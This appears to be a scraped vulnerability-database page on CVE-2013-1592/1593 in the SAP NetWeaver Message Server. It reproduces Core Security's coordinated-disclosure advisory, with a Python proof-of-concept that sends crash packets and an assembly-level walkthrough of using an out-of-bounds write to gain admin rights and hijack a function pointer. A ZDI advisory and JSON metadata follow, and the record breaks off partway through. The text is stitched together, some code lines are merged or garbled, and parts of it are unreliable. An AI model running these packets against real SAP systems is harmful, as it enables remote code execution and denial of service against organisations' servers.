7.01 SR1 SAP Netweaver 7.02 SP06 SAP Netweaver 7.30 SP04.
The vulnerability is due to a memory pointer error while processing certain packets by the affected software. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
CORE-2012-1128
- Advisory Information
Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date of last update: 2013-02-13 Vendors contacted: SAP Release mode: Coordinated release
- Vulnerability Information
Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1592, CVE-2013-1593
-
By sending different messages, the different vulnerabilities can be triggered.
-
Vulnerable packages
. Older versions are probably affected too, but they were not checked.
- Non-vulnerable packages
. Vendor did not provide this information.
- Vendor Information, Solutions and Workarounds
SAP released the security note 1800603 [2] regarding these issues.
- Credits
Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team.
- Technical Description / Proof of Concept Code
The following python script is the main PoC that can be used to reproduce all vulnerabilities described below:
/----- import socket, struct from optparse import OptionParser
Parse the target options
parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900) (options, args) = parser.parse_args()
client_string = '-'+' '39 server_name = '-'+' '39
def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet)
def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data)
def initialize_connection(hostname, port):
# Connect
print "[*] Connecting to", hostname, "port", port
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((hostname, port))
# Send initialization packet
print "[*] Conected, sending login request"
init = '**MESSAGE**\x00' # eyecatcher
init+= '\x04' # version
init+= '\x00' # errorno
init+= client_string # toname
init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' #
msgtype/reserved/key init+= '\x01\x08' # flag / iflag (MS_LOGIN_2) init+= client_string # fromname init+= '\x00\x00' # padd send_packet(connection, init)
# Receive response
print "[*] Receiving login reply"
(length, data) = receive(connection)
# Parsing login reply
server_name = data[4+64:4+64+40]
return connection
Main PoC body
connection = initialize_connection(options.hostname, options.port) send_attack(connection)
-----/
In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities.
8.1. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module.
The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows:
/----- 00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type) 00000000 senderclusterid dd ? 00000004 clusterid dd ? 00000008 serviceid dd ? 0000000C groupid dd ? 00000010 nodetype db ? 00000011 db ? ; undefined 00000012 db ? ; undefined 00000013 db ? ; undefined 00000014 totallength dd ? 00000018 currentlength dd ? 0000001C currentoffset dd ? 00000020 totalblocks db ? 00000021 currentblock db ? 00000021 00000022 db ? ; undefined 00000023 db ? ; undefined 00000024 messagetype dd ? 00000028 MSJ2EE_HEADER ends -----/ The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT':
/----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ...
-----/ This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function:
/----- mov edi, [ebp+pJ2eeHeader] mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker controls MSJ2EE_HEADER.serviceid xor ecx, ecx cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx lea esi, [eax+eax8] lea esi, j2ee_stat_services.totalMsgCount[esi8] ;using the index without validating array bounds
-----/ Since the 'serviceid' value is first multiplied by 9 and then it is multiplied by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct:
/----- 00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type) 00000000 ; XREF: .data:j2ee_stat_totalr 00000000 ; .data:j2ee_stat_servicesr 00000000 totalMsgCount dq ? ; XREF: _MsJ2EE_AddStatistics+1Br 00000000 ; _MsJ2EE_AddStatistics+2Fr ... 00000008 totalMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+192r 00000008 ; _MsJ2EE_AddStatistics+19Br ... 00000010 avgMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+1C2w 00000010 ; _MsJ2EE_AddStatistics+1C7w ... 00000018 maxLength dq ? ; XREF: _MsJ2EE_AddStatistics+161r 00000018 ; _MsJ2EE_AddStatistics+16Er ... 00000020 noP2PMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D442w 00000020 ; _MsJ2EE_AddStatistics+158w ... 00000028 noP2PRequest dq ? ; XREF: _MsJ2EE_AddStatistics+144w 00000028 ; _MsJ2EE_AddStatistics+14Aw ... 00000030 noP2PReply dq ? ; XREF: _MsJ2EE_AddStatistics+132w 00000030 ; _MsJ2EE_AddStatistics+138w ... 00000038 noBroadcastMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw 00000038 ; _MsJ2EE_AddStatistics+123w ... 00000040 noBroadcastRequest dq ? ; XREF: _MsJ2EE_AddStatistics+10Fw 00000040 ; _MsJ2EE_AddStatistics+115w ... 00000048 MSJ2EE_STAT_ELEMENT ends
-----/ However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below:
/----- At this point: * ESI points to an arbitrary, attacker-controlled memory address * EBX == 1
.text:0044D359 movzx eax, [ebp+msiflag] .text:0044D35D sub eax, 0Ch .text:0044D360 jz short loc_44D37C .text:0044D362 sub eax, ebx .text:0044D364 jnz short loc_44D39D .text:0044D366 cmp [ebp+msflag], 2 .text:0044D36A jnz short loc_44D374 .text:0044D36C add [esi+40h], ebx ; iflag=0xd, flag=2 => add 1 to [esi+0x40] .text:0044D36F adc [esi+44h], ecx .text:0044D372 jmp short loc_44D39D .text:0044D374 ;
.text:0044D374 .text:0044D374 loc_44D374: ; CODE XREF: _MsJ2EE_AddStatistics+7Aj .text:0044D374 add [esi+38h], ebx ; iflag=0xd, flag=1 => add 1 to [esi+0x38] .text:0044D377 adc [esi+3Ch], ecx .text:0044D37A jmp short loc_44D39D .text:0044D37C ;
.text:0044D37C .text:0044D37C loc_44D37C: ; CODE XREF: _MsJ2EE_AddStatistics+70j .text:0044D37C mov al, [ebp+msflag] .text:0044D37F cmp al, 3 .text:0044D381 jnz short loc_44D38B .text:0044D383 add [esi+30h], ebx ; iflag=0xc, flag=3 => add 1 to [esi+0x30] .text:0044D386 adc [esi+34h], ecx .text:0044D389 jmp short loc_44D39D .text:0044D38B ;
.text:0044D38B .text:0044D38B loc_44D38B: ; CODE XREF: _MsJ2EE_AddStatistics+91j .text:0044D38B cmp al, 2 .text:0044D38D jnz short loc_44D397 .text:0044D38F add [esi+28h], ebx ; iflag=0xc, flag=2 => add 1 to [esi+0x28] .text:0044D392 adc [esi+2Ch], ecx .text:0044D395 jmp short loc_44D39D .text:0044D397 ;
.text:0044D397 .text:0044D397 loc_44D397: ; CODE XREF: _MsJ2EE_AddStatistics+9Dj .text:0044D397 add [esi+20h], ebx ; iflag=0xc, flag=1 => add 1 to [esi+0x20] .text:0044D39A adc [esi+24h], ecx
[...]
-----/ And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives:
/----- .text:0044D3B7 add [esi], ebx ;add 1 to [esi] .text:0044D3B9 adc dword ptr [esi+4], 0 .text:0044D3BD mov eax, [edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully controlled by the attacker .text:0044D3C0 cdq .text:0044D3C1 add [esi+8], eax ;add an arbitrary number to [esi+8]
-----/ This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server.
A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below:
/----- 00000000 MSADM_s struc ; (sizeof=0x538, standard type) 00000000 ; XREF: .data:dummy_clientr 00000000 client_type dd ? ; enum MS_CLIENT_TYPE 00000004 stat dd ? ; enum MS_STAT 00000008 connection_ID dd ? 0000000C status db ? 0000000D dom db ? ; XREF: MsSFillCon+3Cw 0000000E admin_allowed db ? 0000000F db ? ; undefined 00000010 name dw 40 dup(?) [...] 00000534 _padding db 4 dup(?) 00000538 MSADM_s ends
-----/ The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client:
/----- .text:004230DC loc_4230DC: ; CODE XREF: MsSLoginClient+AAAj .text:004230DC ; MsSLoginClient+B26j .text:004230DC cmp byte ptr [edi+0Eh], 0 ; privileged client? .text:004230E0 jnz short loc_4230EA ; if yes, jump .text:004230E2 mov al, byte ptr ms_admin_allowed ; otherwise, grab the value of the "ms_admin_allowed" global variable... .text:004230E7 mov [edi+0Eh], al ; ...and save it to MSADM_s.admin_allowed
-----/ So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different than 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0':
/----- .data:008F17F0 ; int ms_admin_allowed .data:008F17F0 ms_admin_allowed dd ? ; DATA XREF: MsSSetMonitor+7Ew .data:008F17F0 ; MsSLoginClient+B62r
-----/ And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0':
/----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ...
-----/ So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server.
After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation:
- Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the little granularity of the memory corruption, some of the most handy-to-exploit function pointers happened to be accessible just for administrative connections.
- Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server.
8.1.1. Gaining remote code execution by overwriting function pointers
Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet.
One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters:
/----- .data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58]
; function pointers associated to the modification of the "ms/max_sleep" parameter .data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER
; function pointers associated to the modification of the "ms/max_vhost" parameter .data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \ .data:0087DED0 offset MsSTestInteger, \ ;<-- we can overwrite this one .data:0087DED0 offset MsSSetMaxVirtHost>
[...]
-----/ By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]' effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set').
After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. This 'MS_SET_PROPERTY' packet will make our overwritten function pointer to be called from the 'MsSChangeParam' function:
/----- .text:00404DB3 loc_404DB3: ; CODE XREF: MsSChangeParam+CDj .text:00404DB3 lea esi, [edi+edi*2] .text:00404DB6 mov edi, [ebp+pvalue] .text:00404DB9 add esi, esi .text:00404DBB mov edx, ms_changeable_parameter.test[esi+esi] .text:00404DC2 add esi, esi .text:00404DC4 push edi .text:00404DC5 push pname .text:00404DC6 call edx ; call our overwritten function pointer
-----/ 'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array.
8.1.2. Modify the configuration and behavior of the server
After gaining administrative privileges for our connections, it is possible to perform 'MS_SET_PROPERTY' packets against the Message Server in order to modify its configuration and behavior. That makes possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps:
- Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'.
- Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number). After sending the second 'MS_SET_PROPERTY' packet, the SAP Netweaver Message Server will start listening on the specified port, waiting for connections from instances of the msmon.exe monitoring program [4].
The following python code can be used to trigger the vulnerability:
/----- def send_attack(connection): print "[] Sending crash packet" crash = 'MESSAGE*\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x0d' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd
crash+=
"ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd" crash+= "\x00\x00\x00\x01" crash+= "\xff\xff\xff\xff" crash+= "\x00\x00\x00\x00" send_packet(connection, crash)
print "[*] Crash sent !"
-----/
8.2. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module.
The following python code can be used to trigger the vulnerability:
/----- def send_attack(connection): print "[] Sending crash packet" crash = 'MESSAGE*\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x05' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd
crash+= "AD-EYECATCH\x00"
crash+= "\x01\x01"
crash+= "%11d" % 104
crash+= "%11d" % 1
crash+= "\x15\x00\x00\x00"
crash+= "\x20\x00\x00\xc8"
crash+= "LALA" + ' '*(20-4)
crash+= "LOLO" + ' '*(40-4)
crash+= " "*36
send_packet(connection, crash)
print "[*] Crash sent !"
-----/
- Report Timeline . 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd,
-
2012-12-10: Core sends an advisory draft with technical details and a PoC. 2012-12-11: The SAP team confirms the reception of the issue. 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28: SAP notifies Core that they will be contacted if tests fails in order to re-schedule the advisory publication. 2013-01-22: First release date missed. 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned. 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosing on Feb 12th. Core also asks additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to security bulletin, CVEs, and patches in order to verify if those patches effectively fix the reported flaws. 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVE were assigned to them. Those vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks additional information regarding the affected and patched version numbers. 2013-02-01: SAP notifies that the security note 1800603 will be released and that note will provide further information regarting this vulnerability. 2013-02-13: Advisory CORE-2012-1128 published.
-
References
[1] http://www.sap.com/platform/netweaver/index.epx. [2] SAP Security note Feb 2013 https://service.sap.com/sap/support/notes/1800603. [3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm.
[4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm.
[5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840. [6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. [7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. [8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/.
- About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
- Disclaimer
The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
ZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-104 June 27, 2012
-
-- CVE ID:
-
-- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C
-
-- Affected Vendors: SAP
-
-- Affected Products: SAP NetWeaver
-
-- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12407.
-
-- Vendor Response: SAP has issued an update to correct this vulnerability. More details can be found at: http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1 0-eea7-ceb666083a6a#section40
-
-- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-06-27 - Coordinated public release of advisory
-
-- Credit: This vulnerability was discovered by:
-
e6af8de8b1d4b2b6d5ba2610cbf9cd38
-
-- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8
wsBVAwUBT+spXFVtgMGTo1scAQLsaAf7BDBhaaXu2xrm0nKo4KXmCuA091M40I4t uAkVEE7Zb4eFCtth3tsGSExGqDJp5LKfMe+KNfXUHMWcju+khxep8qfwxhnrtK2E 1doQXQmrqCJunJLKwReEa5MpcZGsYyantq0kCczWf5ZYlzLEsSk51GEYfvHx7WrR XFTr4krClMcDxi9nOxNDr/CqqGxxQlDgBsMD3EyzVQ92PBG8kTZHUAJwBPqh7Ku3 JqBWzVKDVVEsGxe7dlG4fXKIaDlCHaHJmsAr7+1Uw/DmfDOaTQMLRLvdGHY9Vpm6 wGIQD/1eAW66eLSBOeWXiRNHcorXRwu/SxQP8zIESkmWLZwKfZqbMA== =t/ct -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202001-0832",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": null,
"trust": 2.1,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "2004s"
},
{
"model": "netweaver abap",
"scope": null,
"trust": 1.2,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.01 sr1"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.02 sp06"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.30 sp04"
},
{
"model": "netweaver abap null",
"scope": "eq",
"trust": 0.4,
"vendor": "sap",
"version": "*"
},
{
"model": "netweaver 2004s",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "BID",
"id": "57956"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007127"
},
{
"db": "NVD",
"id": "CVE-2013-1592"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.01:sr1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.02:sp06:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:sp04:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:2004s:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-1592"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "e6af8de8b1d4b2b6d5ba2610cbf9cd38",
"sources": [
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
}
],
"trust": 2.1
},
"cve": "CVE-2013-1592",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2013-1592",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "ZDI-12-112",
"impactScore": 8.5,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "ZDI-12-111",
